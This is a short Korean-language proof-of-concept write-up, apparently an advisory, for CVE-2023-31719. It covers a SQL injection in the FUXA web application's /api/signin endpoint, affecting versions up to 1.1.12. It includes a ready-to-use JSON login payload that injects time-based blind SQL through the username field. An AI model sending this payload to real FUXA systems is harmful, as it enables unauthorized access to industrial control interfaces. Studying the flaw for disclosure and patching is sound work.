
CVE-2023-31719에 대한 개념 증명 익스플로잇으로, FUXA 웹 애플리케이션의 /api/signin 엔드포인트에서 조작된 JSON 사용자 이름 매개변수를 통해 SQL 인젝션을 시연합니다.
JSON 매개변수 "username"에 SQL 코드를 주입하는 것이 가능하며, 이는 /api/signin 엔드포인트로 HTTP POST 요청을 통해 이루어집니다.
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}
영향받는 제품명: FUXA
영향받는 버전: <= 1.1.12
문제: SQL Injection
설명: JSON 매개변수 "username"에 SQL 코드를 주입하는 것이 가능하며, 이는 /api/signin 엔드포인트로 HTTP POST 요청을 통해 이루어집니다.